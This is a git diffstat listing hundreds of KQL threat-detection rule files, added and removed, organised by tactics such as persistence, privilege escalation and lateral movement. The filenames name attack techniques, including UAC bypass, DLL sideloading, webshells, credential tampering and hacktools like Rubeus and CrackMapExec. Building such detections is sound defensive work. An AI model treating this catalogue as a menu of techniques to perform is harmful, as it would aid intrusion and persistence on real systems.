| 10 + .../suspicious_ultravnc_execution.kql | 10 + .../windows_admin_share_mount_via_net_exe.kql | 12 + ..._hosted_webdav_share_mount_via_net_exe.kql | 10 + .../windows_share_mount_via_net_exe.kql | 12 + .../winrs_local_command_execution.kql | 14 ++ ...mers_activity_via_scrcons_exe_dll_load.kql | 13 + .../wmiexec_default_output_file.kql | 12 + ...sions_to_hide_services_via_set_service.kql | 12 + ..._windows_security_center_notifications.kql | 10 + ...ugger_entry_to_aedebug_for_persistence.kql | 12 + ...ger_entry_to_hangs_key_for_persistence.kql | 12 + .../add_disallowrun_execution_to_registry.kql | 10 + .../allow_rdp_remote_assistance_feature.kql | 12 + KQL/rules/Persistence/change_the_fax_dll.kql | 10 + ...ccount_associated_with_the_fax_service.kql | 10 + .../chopper_webshell_process_pattern.kql | 10 + ...nstance_executed_with_custom_extension.kql | 12 + .../clickonce_trust_prompt_tampering.kql | 12 + .../Persistence/com_hijack_via_sdclt.kql | 10 + ...nication_to_uncommon_destination_ports.kql | 10 + .../crashcontrol_crashdump_disabled.kql | 12 + ..._local_hidden_user_account_by_registry.kql | 10 + .../creation_of_a_local_user_account.kql | 12 + ..._internal_tools_or_feature_in_registry.kql | 12 + ..._windows_security_center_notifications.kql | 10 + ..._hijackig_via_additional_space_in_path.kql | 12 + .../dns_over_https_enabled_by_registry.kql | 15 ++ .../dropping_of_password_filter_dll.kql | 10 + .../Persistence/enable_lm_hash_storage.kql | 12 + .../enable_lm_hash_storage_proccreation.kql | 12 + ...ing_cor_profiler_environment_variables.kql | 10 + .../esxi_account_creation_via_esxcli.kql | 12 + ...mission_assigned_to_account_via_esxcli.kql | 12 + .../etw_logging_disabled_for_rpcrt4_dll.kql | 10 + .../etw_logging_disabled_for_scm.kql | 10 + ...abled_in_net_processes_sysmon_registry.kql | 10 + .../hacktool_powerup_write_hijack_dll.kql | 15 ++ ...acktool_sharpup_privesc_tool_execution.kql | 10 + .../Persistence/ie_change_domain_zone.kql | 12 + ..._code_module_command_line_installation.kql | 12 + .../imports_registry_key_from_a_file.kql | 13 + .../imports_registry_key_from_an_ads.kql | 10 + KQL/rules/Persistence/interactive_at_job.kql | 12 + .../Persistence/linux_webshell_indicators.kql | 12 + .../Persistence/macos_emond_launch_daemon.kql | 12 + ...d_in_a_potentially_suspicious_document.kql | 12 + ...ropped_in_the_teams_or_onedrive_folder.kql | 12 + ...sk_system_power_settings_via_systemctl.kql | 15 ++ .../modification_of_ie_registry_settings.kql | 10 + ...odify_user_shell_folders_startup_value.kql | 10 + .../monitoring_for_persistence_via_bits.kql | 14 ++ ...sexchange_transport_agent_installation.kql | 12 + ...enassemblyusagelog_registry_key_tamper.kql | 13 + .../netntlm_downgrade_attack_registry.kql | 12 + ..._custom_db_path_registry_configuration.kql | 12 + ...custom_vbscript_registry_configuration.kql | 12 + ...ustom_wmi_query_registry_configuration.kql | 12 + .../new_kernel_driver_via_sc_exe.kql | 12 + .../new_odbc_driver_registered.kql | 12 + .../new_service_creation_using_powershell.kql | 13 + .../new_service_creation_using_sc_exe.kql | 13 + ...ders_registered_with_uncommon_dll_name.kql | 13 + .../new_user_created_via_net_exe.kql | 13 + ...d_via_net_exe_with_never_expire_option.kql | 12 + ..._privileged_usage_of_reg_or_powershell.kql | 10 + ...office_application_startup_office_test.kql | 12 + .../office_macros_warning_disabled.kql | 12 + ...ientmailrules_setting_enabled_registry.kql | 10 + ...ook_security_settings_updated_registry.kql | 12 + .../path_to_screensaver_binary_modified.kql | 12 + ...tence_via_disk_cleanup_handler_autorun.kql | 16 ++ .../persistence_via_hhctrl_ocx.kql | 12 + .../persistence_via_new_sip_provider.kql | 12 + .../persistence_via_sticky_key_backdoor.kql | 14 ++ ...persistence_via_typedpaths_commandline.kql | 10 + ...scalation_via_weak_service_permissions.kql | 10 + .../potential_appverifui_dll_sideloading.kql | 12 + .../potential_avkkid_dll_sideloading.kql | 10 + .../potential_azure_browser_sso_abuse.kql | 14 ++ ...inary_or_script_dropper_via_powershell.kql | 12 + ...tstrike_service_installations_registry.kql | 13 + .../potential_eacore_dll_sideloading.kql | 12 + .../potential_edputil_dll_sideloading.kql | 12 + .../potential_goopdate_dll_sideloading.kql | 13 + .../potential_iviewers_dll_sideloading.kql | 10 + .../potential_mfdetours_dll_sideloading.kql | 12 + ...rsistence_attempt_via_errorhandler_cmd.kql | 12 + .../potential_persistence_via_autodialdll.kql | 12 + ...tential_persistence_via_chm_helper_dll.kql | 10 + ...ersistence_via_custom_protocol_handler.kql | 12 + ...ence_via_disk_cleanup_handler_registry.kql | 18 ++ ...ential_persistence_via_dllpathoverride.kql | 10 + ...ersistence_via_event_viewer_events_asp.kql | 10 + ..._persistence_via_excel_add_in_registry.kql | 10 + ...tential_persistence_via_lsa_extensions.kql | 14 ++ ...ersistence_via_microsoft_office_add_in.kql | 12 + ...ce_via_microsoft_office_startup_folder.kql | 13 + .../potential_persistence_via_mpnotify.kql | 12 + ...rsistence_via_mycomputer_registry_keys.kql | 12 + ...stence_via_new_amsi_providers_registry.kql | 12 + ...ential_persistence_via_notepad_plugins.kql | 13 + ...potential_persistence_via_outlook_form.kql | 12 + .../potential_persistence_via_typedpaths.kql | 12 + ...nce_via_visual_studio_tools_for_office.kql | 12 + ...ation_via_service_permissions_weakness.kql | 10 + .../potential_qakbot_registry_activity.kql | 10 + .../potential_rcdll_dll_sideloading.kql | 10 + ..._dll_sideloading_from_default_location.kql | 10 + ..._sideloading_from_non_default_location.kql | 12 + .../potential_roboform_dll_sideloading.kql | 12 + ...ll_context_menu_scan_command_tampering.kql | 10 + ...otential_shelldispatch_dll_sideloading.kql | 12 + ...m_database_persistence_via_sdbinst_exe.kql | 12 + .../potential_smadhook_dll_sideloading.kql | 12 + ...ential_solidpdfcreator_dll_sideloading.kql | 10 + ...picious_powershell_module_file_created.kql | 12 + ...ous_registry_file_imported_via_reg_exe.kql | 12 + ..._rdp_related_registry_keys_via_reg_exe.kql | 10 + .../potential_vivaldi_elf_dll_sideloading.kql | 10 + .../potential_waveedit_dll_sideloading.kql | 12 + ...al_webshell_creation_on_static_website.kql | 12 + .../potential_wwlib_dll_sideloading.kql | 10 + ...ious_child_process_of_keyscrambler_exe.kql | 10 + ...esktop_background_change_using_reg_exe.kql | 14 ++ ...desktop_background_change_via_registry.kql | 14 ++ ...picious_malware_callback_communication.kql | 11 + ...s_malware_callback_communication_linux.kql | 11 + ...hell_script_creation_in_profile_folder.kql | 13 + .../powershell_module_file_created.kql | 12 + ...file_created_by_non_powershell_process.kql | 10 + .../powershell_profile_modification.kql | 12 + ...hell_script_dropped_via_powershell_exe.kql | 12 + ...er_creation_by_non_sysinternals_binary.kql | 14 ++ ...er_creation_by_non_sysinternals_binary.kql | 12 + .../pua_system_informer_execution.kql | 12 + ..._winnti_playbook_registry_manipulation.kql | 10 + .../Persistence/reg_add_suspicious_paths.kql | 12 + .../register_new_ifiltre_for_persistence.kql | 14 ++ .../registry_explorer_policy_modification.kql | 12 + .../registry_hide_function_from_user.kql | 12 + ...gistry_manipulation_via_wmi_stdregprov.kql | 15 ++ ..._modification_to_hidden_file_extension.kql | 12 + .../registry_modification_via_regini_exe.kql | 12 + ...ccess_tool_anydesk_incoming_connection.kql | 13 + ...l_screenconnect_installation_execution.kql | 12 + ...m_viewer_session_started_on_linux_host.kql | 14 ++ ...m_viewer_session_started_on_macos_host.kql | 14 ++ ...viewer_session_started_on_windows_host.kql | 14 ++ ..._potential_com_hijacking_registry_keys.kql | 14 ++ ...ctedadminmode_registry_value_tampering.kql | 13 + ..._registry_value_tampering_proccreation.kql | 13 + ...un_once_task_configuration_in_registry.kql | 12 + ...sk_execution_as_configured_in_registry.kql | 10 + ...sabled_via_minint_registry_key_process.kql | 15 ++ ...d_via_minint_registry_key_registry_set.kql | 15 ++ .../service_binary_in_suspicious_folder.kql | 10 + ...dacl_abuse_to_hide_services_via_sc_exe.kql | 10 + ...curity_descriptor_tampering_via_sc_exe.kql | 10 + KQL/rules/Persistence/servicedll_hijack.kql | 15 ++ .../shell_open_registry_keys_manipulation.kql | 10 + KQL/rules/Persistence/shimcache_flush.kql | 10 + .../startup_item_file_created_macos.kql | 15 ++ .../suspicious_aspx_file_drop_by_exchange.kql | 10 + ...nstance_executed_with_custom_extension.kql | 10 + ...spicious_debugger_registration_cmdline.kql | 10 + ..._activity_from_fake_recycle_bin_folder.kql | 10 + .../suspicious_file_drop_by_exchange.kql | 10 + ...s_file_write_to_webapps_root_directory.kql | 12 + .../suspicious_iis_module_registration.kql | 12 + .../suspicious_new_service_creation.kql | 12 + ...ious_printer_driver_empty_manufacturer.kql | 12 + ...spicious_process_by_web_server_process.kql | 13 + ...execution_from_fake_recycle_bin_folder.kql | 12 + ...y_modification_from_ads_via_regini_exe.kql | 10 + ...uspicious_screensave_change_by_reg_exe.kql | 14 ++ .../suspicious_service_path_modification.kql | 12 + .../suspicious_vboxdrvinst_exe_parameters.kql | 15 ++ ...nt_connection_history_cleared_registry.kql | 10 + ...rust_access_disable_for_vbapplications.kql | 12 + ..._bypass_via_windows_directory_spoofing.kql | 14 ++ .../Persistence/uac_bypass_with_fake_dll.kql | 12 + ...fi_persistence_via_wpbbin_filecreation.kql | 12 + ...persistence_via_wpbbin_processcreation.kql | 12 + ..._database_installation_via_sdbinst_exe.kql | 12 + ...icrosoft_office_trusted_location_added.kql | 12 + ...allation_attempt_using_add_appxpackage.kql | 12 + .../unusual_child_process_of_dns_exe.kql | 10 + .../unusual_file_deletion_by_dns_exe.kql | 10 + .../unusual_file_modification_by_dns_exe.kql | 10 + .../user_added_to_admin_group_via_dscl.kql | 12 + ...r_added_to_admin_group_via_dseditgroup.kql | 12 + ...r_added_to_admin_group_via_sysadminctl.kql | 12 + ...vscode_powershell_profile_modification.kql | 12 + ...digest_credguard_registry_modification.kql | 13 + .../wdigest_enable_uselogoncredential.kql | 10 + ...l_detection_with_command_line_keywords.kql | 10 + .../webshell_hacking_activity_patterns.kql | 13 + .../webshell_tool_reconnaissance_activity.kql | 11 + ...inlogon_allowmultipletssessions_enable.kql | 15 ++ .../wmi_persistence_script_event_consumer.kql | 13 + .../Persistence/wmi_persistence_security.kql | 12 + ...d_port_monitor_persistence_in_registry.kql | 12 + ...curity_descriptor_tampering_via_sc_exe.kql | 10 + .../atbroker_registry_change.kql | 12 + .../bypass_uac_using_delegateexecute.kql | 10 + .../bypass_uac_using_event_viewer.kql | 10 + .../bypass_uac_using_silentcleanup_task.kql | 13 + .../bypass_uac_via_cmstp.kql | 12 + .../bypass_uac_via_wsreset_exe.kql | 12 + ...le_association_to_executable_via_assoc.kql | 12 + ...nge_default_file_association_via_assoc.kql | 14 ++ ...ng_service_imagepath_value_via_reg_exe.kql | 13 + .../classes_autorun_keys_modification.kql | 13 + .../com_hijacking_via_treatas.kql | 12 + ..._of_default_system_clsid_default_value.kql | 12 + .../common_autorun_keys_modification.kql | 13 + .../control_panel_items.kql | 10 + ...created_files_by_microsoft_sync_center.kql | 10 + ...ion_exe_for_service_with_unquoted_path.kql | 12 + ...werfault_exe_wer_dll_in_unusual_folder.kql | 10 + ...ntcontrolset_autorun_keys_modification.kql | 13 + ...rrentversion_autorun_keys_modification.kql | 13 + ...ntversion_nt_autorun_keys_modification.kql | 13 + ..._rdp_port_changed_to_non_standard_port.kql | 13 + ...curity_descriptor_tampering_via_sc_exe.kql | 10 + .../dhcp_callout_dll_installation.kql | 10 + .../direct_autorun_keys_modification.kql | 14 ++ ...execution_via_register_cimprovider_exe.kql | 10 + .../dll_load_via_lsass.kql | 10 + ...dll_sideloading_by_vmware_xfer_utility.kql | 12 + .../dllhost_exe_execution_anomaly.kql | 12 + .../explorer_nouaccheck_flag.kql | 13 + .../fax_service_dll_search_order_hijack.kql | 12 + ...on_in_suspicious_directory_by_msdt_exe.kql | 10 + .../guest_account_enabled_via_sysadminctl.kql | 10 + ...cktool_crackmapexec_execution_patterns.kql | 10 + ..._dinjector_powershell_cradle_execution.kql | 12 + .../hacktool_hollowreaper_execution.kql | 12 + .../hacktool_impersonate_execution.kql | 10 + .../hacktool_sharpdpapi_execution.kql | 12 + .../hacktool_sharpersist_execution.kql | 10 + .../hacktool_sharpimpersonation_execution.kql | 10 + .../hacktool_winpeas_execution.kql | 12 + ...or_privilege_escalation_tool_execution.kql | 12 + ...net_explorer_autorun_keys_modification.kql | 13 + ...h_agent_daemon_execution_via_launchctl.kql | 12 + .../linux_sudo_chroot_execution.kql | 16 ++ ..._center_suspicious_network_connections.kql | 10 + .../narrator_s_feedback_hub_persistence.kql | 10 + ...k_connection_initiated_via_notepad_exe.kql | 15 ++ ...ripteventconsumer_created_via_wmic_exe.kql | 12 + .../new_custom_shim_database_created.kql | 14 ++ ...new_dns_serverlevelplugindll_installed.kql | 10 + ...evelplugindll_installed_via_dnscmd_exe.kql | 10 + ..._registered_from_a_suspicious_location.kql | 11 + .../new_outlook_macro_created.kql | 12 + ..._run_key_pointing_to_suspicious_folder.kql | 12 + .../office_autorun_keys_modification.kql | 13 + ...cution_without_warning_setting_enabled.kql | 12 + .../password_set_to_never_expire_via_wmi.kql | 13 + .../persistence_via_cron_files.kql | 12 + .../persistence_via_sudoers_files.kql | 12 + ..._hijacking_via_treatas_subkey_registry.kql | 12 + ...jection_or_execution_using_tracker_exe.kql | 10 + ...ential_dll_sideloading_of_dbgmodel_dll.kql | 12 + ...potential_dll_sideloading_of_mpsvc_dll.kql | 12 + ...ential_dll_sideloading_of_mscorsvc_dll.kql | 12 + ...tial_dll_sideloading_using_coregen_exe.kql | 10 + ...dll_sideloading_via_deviceenroller_exe.kql | 12 + ...ential_dll_sideloading_via_vmware_xfer.kql | 12 + ..._access_via_dll_search_order_hijacking.kql | 10 + ..._process_code_injection_via_dd_utility.kql | 10 + .../potential_mpclient_dll_sideloading.kql | 12 + ..._dll_sideloading_via_defender_binaries.kql | 12 + ...attempt_via_existing_service_tampering.kql | 10 + ...nce_attempt_via_run_keys_using_reg_exe.kql | 14 ++ .../potential_persistence_using_debugpath.kql | 10 + ...istence_via_app_paths_default_property.kql | 16 ++ ...via_appcompat_registerapprestart_layer.kql | 15 ++ .../potential_persistence_via_globalflags.kql | 10 + ...sistence_via_logon_scripts_commandline.kql | 12 + ...persistence_via_logon_scripts_registry.kql | 12 + ..._via_microsoft_compatibility_appraiser.kql | 12 + ...ntial_persistence_via_netsh_helper_dll.kql | 11 + ...sistence_via_netsh_helper_dll_registry.kql | 13 + ...utlook_loadmacroprovideronboot_setting.kql | 10 + .../potential_persistence_via_plistbuddy.kql | 10 + ...powershell_search_order_hijacking_task.kql | 10 + ...rsistence_via_scrobj_dll_com_hijacking.kql | 12 + ...via_shim_database_in_uncommon_location.kql | 10 + ...istence_via_shim_database_modification.kql | 14 ++ ...tion_using_symlink_between_osk_and_cmd.kql | 10 + ...tential_process_injection_via_msra_exe.kql | 12 + ...otential_psfactorybuffer_com_hijacking.kql | 10 + ...istence_attempt_via_dbgmanageddebugger.kql | 12 + ...sistence_attempt_via_windows_telemetry.kql | 14 ++ ...ential_ripzip_attack_on_startup_folder.kql | 13 + ...istence_install_using_a_scheduled_task.kql | 10 + ...hortcut_persistence_via_powershell_exe.kql | 16 ++ .../potential_uac_bypass_via_sdclt_exe.kql | 10 + ...ll_web_access_feature_enabled_via_dism.kql | 12 + ...istry_persistence_via_explorer_run_key.kql | 10 + ..._dll_execution_with_uncommon_extension.kql | 12 + .../renamed_vmnat_exe_execution.kql | 10 + .../root_account_enable_via_dsenableroot.kql | 10 + .../rundll32_registered_com_objects.kql | 12 + ...ially_suspicious_path_via_schtasks_exe.kql | 13 + ...ation_masquerading_as_system_processes.kql | 12 + ...th_curl_and_powershell_execution_combo.kql | 15 ++ ...xecuting_encoded_payload_from_registry.kql | 12 + ...d_task_executing_payload_from_registry.kql | 10 + .../scheduled_task_job_at.kql | 14 ++ ...d_taskcache_change_by_uncommon_program.kql | 10 + ...or_modification_with_system_privileges.kql | 10 + .../schtasks_from_suspicious_folders.kql | 10 + ..._privileges_enumeration_via_whoami_exe.kql | 10 + ...rovider_ssp_added_to_lsa_configuration.kql | 11 + ...sion_manager_autorun_keys_modification.kql | 13 + ...p16_exe_execution_with_custom_lst_file.kql | 15 ++ .../startup_folder_file_write.kql | 12 + .../sticky_key_like_backdoor_execution.kql | 12 + ...ticky_key_like_backdoor_usage_registry.kql | 12 + ...ious_autorun_registry_modified_via_wmi.kql | 13 + ...nd_patterns_in_scheduled_task_creation.kql | 12 + .../suspicious_desktop_ini_action.kql | 13 + ...spicious_driver_install_by_pnputil_exe.kql | 14 ++ .../suspicious_get_variable_exe_creation.kql | 13 + .../suspicious_grpconv_execution.kql | 10 + .../suspicious_gup_usage.kql | 12 + ...icious_modification_of_scheduled_tasks.kql | 13 + ...ication_on_the_printer_spooler_service.kql | 10 + .../suspicious_outlook_macro_created.kql | 12 + ...icious_powershell_in_registry_run_keys.kql | 12 + .../suspicious_run_key_from_download.kql | 12 + ...suspicious_runas_like_flag_combination.kql | 10 + ...ious_rundll32_invoking_inline_vbscript.kql | 10 + ...ed_task_creation_involving_temp_folder.kql | 13 + ...task_creation_via_masqueraded_xml_file.kql | 10 + ...suspicious_scheduled_task_name_as_guid.kql | 12 + ...scheduled_task_write_to_system32_tasks.kql | 10 + ...ious_schtasks_execution_appdata_folder.kql | 10 + ...sks_schedule_type_with_high_privileges.kql | 12 + .../suspicious_schtasks_schedule_types.kql | 12 + ...cious_screensaver_binary_file_creation.kql | 12 + ...cl_modification_via_set_service_cmdlet.kql | 10 + ...icious_shim_database_patching_activity.kql | 10 + .../suspicious_startup_folder_persistence.kql | 15 ++ .../suspicious_userinit_child_process.kql | 12 + .../sysinternals_psservice_execution.kql | 12 + .../sysinternals_pssuspend_execution.kql | 10 + ...stem_scripts_autorun_keys_modification.kql | 13 + .../tasks_folder_evasion.kql | 13 + ...cross_ebpf_rootkit_default_persistence.kql | 12 + .../trustedpath_uac_bypass_pattern.kql | 10 + .../Privilege Escalation/uac_disabled.kql | 11 + .../uac_notification_disabled.kql | 13 + .../uac_secure_desktop_prompt_disabled.kql | 13 + .../uncommon_userinit_child_process.kql | 12 + .../user_added_to_highly_privileged_group.kql | 12 + ...er_added_to_local_administrators_group.kql | 12 + ...ed_to_root_sudoers_group_using_usermod.kql | 12 + .../using_settingsynchost_exe_as_lolbin.kql | 10 + .../vbscript_payload_stored_in_registry.kql | 10 + ..._exe_execution_from_privileged_process.kql | 10 + ...vent_log_access_tampering_via_registry.kql | 13 + ...tings_modification_by_uncommon_process.kql | 12 + .../winekey_registry_modification.kql | 10 + .../winlogon_notify_key_logon_persistence.kql | 12 + ...ar_creating_files_in_startup_locations.kql | 12 + .../winsock2_autorun_keys_modification.kql | 13 + .../wmi_backdoor_exchange_transport_agent.kql | 10 + ...ersistence_command_line_event_consumer.kql | 12 + ...tence_script_event_consumer_file_write.kql | 12 + ...node_classes_autorun_keys_modification.kql | 13 + ...rrentversion_autorun_keys_modification.kql | 13 + ...rrentversion_autorun_keys_modification.kql | 13 + .../writing_local_admin_share.kql | 12 + ...xe_execution_from_non_default_location.kql | 14 ++ .../access_of_sudoers_file_content.kql | 12 + .../Reconnaissance/linux_recon_indicators.kql | 12 + ...umeration_using_ad_module_proccreation.kql | 12 + .../print_history_file_contents.kql | 12 + .../pua_pingcastle_execution.kql | 10 + ...ion_from_potentially_suspicious_parent.kql | 11 + .../Reconnaissance/suspicious_git_clone.kql | 10 + .../suspicious_git_clone_linux.kql | 10 + .../creation_of_a_diagcab.kql | 12 + .../hacktool_purplesharp_execution.kql | 12 + ...nmanager_service_installation_registry.kql | 10 + ...ential_execution_of_sysinternals_tools.kql | 13 + ...l_privilege_escalation_to_local_system.kql | 13 + .../potential_psexec_remote_execution.kql | 10 + ...exec_paexec_escalation_to_local_system.kql | 13 + .../pua_csexec_execution.kql | 10 + ...ua_sysinternal_tool_execution_registry.kql | 13 + ..._sysinternals_tools_execution_registry.kql | 12 + ...named_sysinternals_debugview_execution.kql | 10 + ...of_renamed_sysinternals_tools_registry.kql | 12 + .../suspicious_keyboard_layout_load.kql | 12 + ..._file_created_in_office_startup_folder.kql | 12 + ...renamed_sysinternals_tools_registryset.kql | 12 + .../vhd_image_download_via_browser.kql | 14 ++ ...rom_Or_To_Admin_Share_Or_Sysvol_Folder.kql | 7 - .../HackTool_-_KrbRelayUp_Execution.kql | 7 - ...ial_Impacket_Lateral_Movement_Activity.kql | 7 - .../HackTool_-_Rubeus_Execution.kql | 7 - .../HackTool_-_SharpMove_Tool_Execution.kql | 8 - ...HackTool_-_WinRM_Access_Via_Evil-WinRM.kql | 7 - ...l_-_Wmiexec_Default_Powershell_Command.kql | 7 - .../MMC_Spawning_Windows_Shell.kql | 7 - ...tsc.EXE_Execution_From_Uncommon_Parent.kql | 7 - .../New_PortProxy_Registry_Entry_Added.kql | 7 - ...rt_Forwarding_Rule_Added_Via_Netsh.EXE.kql | 7 - ...top_Connection_Initiated_Via_Mstsc.EXE.kql | 9 - ...DP_Connections_Over_Non-Standard_Tools.kql | 9 - ...oy_Remote_Adminstartion_Tool_Execution.kql | 7 - .../PSEXEC_Remote_Execution_File_Artefact.kql | 7 - .../PUA_-_Radmin_Viewer_Utility_Execution.kql | 7 - ...rd_Provided_In_Command_Line_Of_Net.EXE.kql | 7 - .../Port_Forwarding_Activity_Via_SSH.EXE.kql | 7 - ...trike_Service_Installations_-_Registry.kql | 8 - ...nternetExplorer.Application_DLL_Hijack.kql | 7 - ...er.Application_DLL_Hijack_-_Image_Load.kql | 7 - ...eral_Movement_Via_ActivateMicrosoftApp.kql | 8 - .../Potential_MSTSC_Shadowing_Activity.kql | 7 - ...rsistence_Via_Logon_Scripts_-_Registry.kql | 7 - .../Potential_Remote_Desktop_Tunneling.kql | 7 - ..._RDP_Related_Registry_Keys_Via_Reg.EXE.kql | 7 - ...scalation_via_Named_Pipe_Impersonation.kql | 7 - .../RDP_Over_Reverse_SSH_Tunnel.kql | 7 - ...rt_Forwarding_Rule_Added_Via_Netsh.EXE.kql | 7 - .../Rundll32_Execution_Without_Parameters.kql | 7 - .../Suspicious_Plink_Port_Forwarding.kql | 7 - .../Suspicious_RDP_Redirect_Using_TSCON.kql | 7 - .../Suspicious_SysAidServer_Child.kql | 7 - .../Suspicious_UltraVNC_Execution.kql | 7 - .../Suspicious_WSMAN_Provider_Image_Loads.kql | 7 - .../Terminal_Service_Process_Spawn.kql | 7 - .../Uncommon_Outbound_Kerberos_Connection.kql | 8 - ...er_Added_to_Remote_Desktop_Users_Group.kql | 7 - ...mers_Activity_Via_Scrcons.EXE_DLL_Load.kql | 7 - .../Windows_Admin_Share_Mount_Via_Net.EXE.kql | 7 - ..._Hosted_WebDav_Share_Mount_Via_Net.EXE.kql | 7 - .../Windows_Share_Mount_Via_Net.EXE.kql | 7 - .../Wmiexec_Default_Output_File.kql | 7 - .../Wmiprvse_Wbemcomn_DLL_Hijack.kql | 7 - .../Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql | 7 - .../Writing_Local_Admin_Share.kql | 9 - ...sions_to_Hide_Services_Via_Set-Service.kql | 7 - ...ugger_Entry_To_AeDebug_For_Persistence.kql | 7 - ...ger_Entry_To_Hangs_Key_For_Persistence.kql | 7 - ...d_Port_Monitor_Persistence_in_Registry.kql | 9 - ...curity_Descriptor_Tampering_Via_Sc.EXE.kql | 7 - ...work_Service_Potential_DLL_Sideloading.kql | 7 - Persistence/Atbroker_Registry_Change.kql | 7 - Persistence/Bypass_UAC_Using_Event_Viewer.kql | 7 - Persistence/COM_Hijacking_via_TreatAs.kql | 7 - ...le_Association_To_Executable_Via_Assoc.kql | 9 - ...nge_Default_File_Association_Via_Assoc.kql | 9 - ...ng_Service_ImagePath_Value_Via_Reg.EXE.kql | 10 - .../Chopper_Webshell_Process_Pattern.kql | 7 - ...nstance_Executed_With_Custom_Extension.kql | 7 - .../Classes_Autorun_Keys_Modification.kql | 7 - .../Common_Autorun_Keys_Modification.kql | 7 - Persistence/Control_Panel_Items.kql | 7 - ...ion_Exe_for_Service_with_Unquoted_Path.kql | 9 - .../Creation_Of_Non-Existent_System_DLL.kql | 9 - ..._Local_Hidden_User_Account_by_Registry.kql | 7 - ...n_of_an_WerFault.exe_in_Unusual_Folder.kql | 7 - ...ntControlSet_Autorun_Keys_Modification.kql | 7 - ...rrentVersion_Autorun_Keys_Modification.kql | 7 - ...ntVersion_NT_Autorun_Keys_Modification.kql | 7 - Persistence/DLL_Load_via_LSASS.kql | 7 - ..._Hijackig_Via_Additional_Space_in_Path.kql | 9 - .../DLL_Sideloading_Of_ShellChromeAPI.DLL.kql | 9 - ..._RDP_Port_Changed_to_Non_Standard_Port.kql | 10 - ...curity_Descriptor_Tampering_Via_Sc.EXE.kql | 7 - .../Direct_Autorun_Keys_Modification.kql | 7 - ...ocal_Manifest_Installation_With_Winget.kql | 7 - ...ing_COR_Profiler_Environment_Variables.kql | 7 - .../Fax_Service_DLL_Search_Order_Hijack.kql | 7 - ...on_In_Suspicious_Directory_By_Msdt.EXE.kql | 7 - Persistence/File_Download_Via_Bitsadmin.kql | 7 - ...itsadmin_To_A_Suspicious_Target_Folder.kql | 7 - ...Bitsadmin_To_An_Uncommon_Target_Folder.kql | 7 - ...ous_Extension_Downloaded_Via_Bitsadmin.kql | 7 - .../HackTool_-_CrackMapExec_Execution.kql | 7 - .../HackTool_-_SharPersist_Execution.kql | 7 - Persistence/IE_Change_Domain_Zone.kql | 7 - ...-Code_Module_Command_Line_Installation.kql | 7 - ...net_Explorer_Autorun_Keys_Modification.kql | 7 - .../Leviathan_Registry_Key_Activity.kql | 7 - ...SExchange_Transport_Agent_Installation.kql | 7 - ...ropped_in_the_Teams_or_OneDrive_Folder.kql | 9 - Persistence/Microsoft_Office_DLL_Sideload.kql | 7 - ...odify_User_Shell_Folders_Startup_Value.kql | 7 - .../Narrator_s_Feedback-Hub_Persistence.kql | 7 - ...riptEventConsumer_Created_Via_Wmic.EXE.kql | 7 - .../New_Custom_Shim_Database_Created.kql | 9 - Persistence/New_Kernel_Driver_Via_SC.EXE.kql | 7 - ..._Registered_From_A_Suspicious_Location.kql | 8 - Persistence/New_ODBC_Driver_Registered.kql | 7 - Persistence/New_Outlook_Macro_Created.kql | 7 - ..._RUN_Key_Pointing_to_Suspicious_Folder.kql | 7 - .../New_Service_Creation_Using_PowerShell.kql | 7 - .../New_Service_Creation_Using_Sc.EXE.kql | 7 - ...ders_Registered_With_Uncommon_DLL_Name.kql | 10 - Persistence/New_User_Created_Via_Net.EXE.kql | 7 - ...d_Via_Net.EXE_With_Never_Expire_Option.kql | 7 - ...fice_Application_Startup_-_Office_Test.kql | 7 - .../Office_Autorun_Keys_Modification.kql | 7 - .../OilRig_APT_Registry_Persistence.kql | 7 - ...cution_Without_Warning_Setting_Enabled.kql | 7 - ...k_Security_Settings_Updated_-_Registry.kql | 7 - .../PSEXEC_Remote_Execution_File_Artefact.kql | 7 - ...rd_Provided_In_Command_Line_Of_Net.EXE.kql | 7 - .../Path_To_Screensaver_Binary_Modified.kql | 7 - ...nce_Via_Disk_Cleanup_Handler_-_Autorun.kql | 13 - Persistence/Persistence_Via_Hhctrl.ocx.kql | 7 - .../Persistence_Via_New_SIP_Provider.kql | 7 - ...rsistence_Via_TypedPaths_-_CommandLine.kql | 7 - ...scalation_via_Weak_Service_Permissions.kql | 7 - Persistence/Potential_7za.DLL_Sideloading.kql | 7 - .../Potential_Amazon_SSM_Agent_Hijacking.kql | 7 - ...ial_Antivirus_Software_DLL_Sideloading.kql | 7 - ...inary_Or_Script_Dropper_Via_PowerShell.kql | 7 - .../Potential_CCleanerDU.DLL_Sideloading.kql | 7 - ...al_CCleanerReactivator.DLL_Sideloading.kql | 7 - ...ijacking_Via_TreatAs_Subkey_-_Registry.kql | 7 - ...al_Chrome_Frame_Helper_DLL_Sideloading.kql | 7 - ...tential_DLL_Sideloading_Of_DBGCORE.DLL.kql | 7 - ...tential_DLL_Sideloading_Of_DBGHELP.DLL.kql | 7 - ...Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql | 7 - ..._Sideloading_Via_ClassicExplorer32.dll.kql | 7 - ...Potential_DLL_Sideloading_Via_JsSchHlp.kql | 7 - ...ntial_DLL_Sideloading_Via_comctl32.dll.kql | 7 - .../Potential_Libvlc.DLL_Sideloading.kql | 7 - ...otential_PSFactoryBuffer_COM_Hijacking.kql | 7 - ...rsistence_Attempt_Via_ErrorHandler.Cmd.kql | 9 - ...Attempt_Via_Existing_Service_Tampering.kql | 7 - ...nce_Attempt_Via_Run_Keys_Using_Reg.EXE.kql | 7 - .../Potential_Persistence_Using_DebugPath.kql | 7 - ...Via_AppCompat_RegisterAppRestart_Layer.kql | 10 - ...istence_Via_App_Paths_Default_Property.kql | 11 - .../Potential_Persistence_Via_AutodialDLL.kql | 7 - ...tential_Persistence_Via_CHM_Helper_DLL.kql | 7 - ...OM_Hijacking_From_Suspicious_Locations.kql | 7 - ...istence_Via_COM_Search_Order_Hijacking.kql | 7 - ...ential_Persistence_Via_DLLPathOverride.kql | 7 - ...ce_Via_Disk_Cleanup_Handler_-_Registry.kql | 13 - ...ersistence_Via_Event_Viewer_Events.asp.kql | 7 - ...ersistence_Via_Excel_Add-in_-_Registry.kql | 7 - .../Potential_Persistence_Via_GlobalFlags.kql | 7 - ...tential_Persistence_Via_LSA_Extensions.kql | 9 - ...stence_Via_Logon_Scripts_-_CommandLine.kql | 7 - ...rsistence_Via_Logon_Scripts_-_Registry.kql | 7 - ..._Via_Microsoft_Compatibility_Appraiser.kql | 9 - ...ersistence_Via_Microsoft_Office_Add-In.kql | 7 - 